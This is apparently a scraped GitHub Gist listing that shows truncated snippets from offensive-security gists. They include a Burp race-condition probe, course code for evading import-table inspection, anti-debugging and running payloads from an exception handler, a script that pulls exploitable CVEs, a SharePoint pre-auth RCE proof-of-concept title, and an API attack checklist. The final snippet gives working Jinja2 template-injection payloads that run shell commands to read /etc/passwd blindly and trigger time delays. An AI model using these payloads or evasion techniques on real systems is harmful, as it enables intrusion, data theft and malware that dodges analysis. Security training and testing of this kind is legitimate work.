albinowax
/ race-condition-probe.java
Last active
April 26, 2025 10:39
Race condition custom action for Burp Repeater
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // This will use the single-packet attack for HTTP/2, and last-byte synchronisation for HTTP/1 | |
| int NUMBER_OF_REQUESTS = 10; | |
| var reqs = new ArrayList<HttpRequest>(); | |
| for (int i = 0; i < NUMBER_OF_REQUESTS; i++) { | |
| reqs.add(requestResponse.request()); | |
| } | |
| var responses = api().http().sendRequests(reqs); | |
| var codes = responses.stream().map(HttpRequestResponse::response).filter(Objects::nonNull).map(HttpResponse::statusCode).toList(); | |
| logging().logToOutput(codes); |
WKL-Sec
/ DynamicAPIResolver.cpp
Created
February 28, 2024 17:56
Demonstrates dynamic resolution of OpenProcess API to bypass IAT, suitable for advanced payload development.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // White Knight Labs - Offensive Development Course | |
| // IAT Table Bypass - GetProcAddress | |
| #include <windows.h> | |
| #include <iostream> | |
| // Typedef for the OpenProcess function | |
| typedef HANDLE (WINAPI *pOpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); | |
| int main() { |
WKL-Sec
/ SystemUserVerification.cpp
Created
February 19, 2024 19:28
This C++ code verifies if a process is running under the SYSTEM account and exits if not.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <sddl.h> | |
| #include <tchar.h> | |
| #include <iostream> | |
| #include <algorithm> | |
| #include <cctype> | |
| // Link with the Advapi32.lib to use Windows Security functions | |
| #pragma comment(lib, "advapi32.lib") |
WKL-Sec
/ AccessViolationHandlerPayloadExecution.cpp
Created
February 12, 2024 17:45
White Knight Labs - Offensive Development Course - Demo of using Exception Filter Function in C++ to catch Access Violations for payload execution and anti-debugging.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // White Knight Labs - Offensive Development Course | |
| // Guardrails - Control Flow & Anti-Debugging | |
| #include <windows.h> | |
| #include <iostream> | |
| // Test function to be called when an access violation occurs | |
| void TestFunction() { | |
| std::cout << "Test function executed after catching access violation." << std::endl; | |
| } |
WKL-Sec
/ PEB_Debugger_Detection.cpp
Created
February 7, 2024 12:46
Debugger Detection with PEB Inspection - White Knight Labs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # White Knight Labs - Offensive Development | |
| # Debugger Check - PEB | |
| #include <windows.h> | |
| #include <iostream> | |
| void TriggerBreakpoint() { | |
| __asm { | |
| int 3 // Software Breakpoint | |
| } |
WKL-Sec
/ FolderPathVerificationSample.cpp
Created
February 5, 2024 15:33
Folder Path Verification C++ Sample: A concise C++ example demonstrating how to verify an application's execution path against a specified directory.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # White Knight Labs - Offensive Development Course | |
| # Guardrails - Folder Check | |
| #include <windows.h> // Include Windows-specific headers for system calls | |
| #include <iostream> // Include for input and output stream operations | |
| #include <string> // Include for using string class | |
| #include <algorithm> // Include for standard algorithms, e.g., std::transform | |
| #include <cctype> // Include for character handling functions, e.g., std::tolower | |
| // Function to check if the path of the current executable is under a specified path |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Run cvemap and give everything that is critical, has a poc and is known to be exploitable by CISA | |
| #.\cvemap.exe -severity=high -f poc,vendor -poc=true -json > new_vulns.json | |
| .\cvemap.exe -severity=critical -severity=high -es '> 0.01' -poc=true -l 1000 -json > new_vulns.json | |
| # Paths to the JSON files | |
| $newJsonFilePath = "new_vulns.json" | |
| $databaseJsonFilePath = "cve_database.json" | |
| # Read the newly fetched JSON file |
testanull
/ SharePwn_public.py
Created
December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
The-XSS-Rat
/ gist:8b6d56df0f439f7f9abb90276d971400
Created
November 2, 2023 17:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Information Disclosure: Look for endpoints that leak sensitive data. | |
| Broken Object-Level Authorization (BOLA/IDOR): Accessing objects not meant for the authenticated user. | |
| Broken User Authentication: Bypassing authentication mechanisms. | |
| Rate Limiting: Test for unprotected endpoints against DoS or brute-force attacks. | |
| HTTP Verb Tampering: Changing the HTTP verb (e.g., from GET to POST). | |
| Missing Function Level Access Control: Accessing unauthorized functionalities. | |
| Parameter Tampering: Altering parameters to manipulate responses. | |
| SQL Injection: Injecting malicious SQL queries in input. | |
| Command Injection: Injecting malicious commands in input. | |
| Unsecured Endpoints: Looking for endpoints that lack security measures. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Time Based | |
| {% if lipsum.__globals__["os"].popen('head -c 1 /etc/passwd').read() == "r" %}Free-Palestine{% elif lipsum.__globals__["os"].popen('sleep 5').read() %}Free-Palestine{% endif %} | |
| # Boolen Based | |
| {% if lipsum.__globals__["os"].popen('head -c 1 /etc/passwd').read() == "r" %}Free-Palestine{% endif %} | |
| # You may pipe chars to md5sum in order to retrieve new lines without headache | |
| {% if lipsum.__globals__["os"].popen('head -c 1 /etc/passwd | md5sum | cut -d " " -f1 | tr -d "\n"').read() == "4b43b0aee35624cd95b910189b3dc231" %}Free-Palestine{% endif %} |
NewerOlder